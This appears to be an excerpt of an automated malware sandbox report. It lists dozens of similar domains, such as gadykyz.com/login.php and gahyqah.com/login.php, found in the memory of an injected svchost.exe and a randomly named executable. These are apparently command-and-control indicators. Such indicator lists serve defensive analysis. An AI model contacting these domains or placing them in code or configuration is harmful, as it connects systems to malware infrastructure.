Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadykyz.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2581725706.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyneh.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302424542.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396823285.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3303400991.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009290000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.000000000165E000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000658000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2767328417.0000000008790000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.000000000843D000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2711620441.0000000008C6C000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyniw.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadypah.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyquz.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyrus.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272090324.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388123270.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194084401.0000000008713000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyveb.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyvis.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyzib.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyzyh.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671356551.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyces.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296191981.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahycib.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahydyb.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337011719.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyfow.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2538475351.00000000087FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272090324.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyfyz.com/login.php
Source: svchost.exe, 00000002.00000003.2370194718.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2368250212.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2753175286.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748730470.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2368486690.0000000003353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahykeb.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahykih.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahynus.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahypoz.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408310468.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408240997.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157020892.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157370436.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267140420.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009309000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.000000000165E000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2767328417.00000000087AD000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000658000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.000000000843D000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2711620441.0000000008C6C000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyqah.com/login.php
Source: svchost.exe, 00000002.00000003.2370194718.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2368250212.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2367199379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759945064.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2370737747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760422520.0000000008787000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2367460277.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2769955415.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768918885.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2368486690.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768918885.0000000008784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyqas.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyqub.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyvab.com/login.php
Source: svchost.exe, 00000002.00000003.2538146592.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272828863.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2275850260.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272537462.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264150395.00000000086FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524832364.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272290978.00000000086FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283080934.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281813924.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2273007343.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyvew.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyzez.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galycah.com/login.php
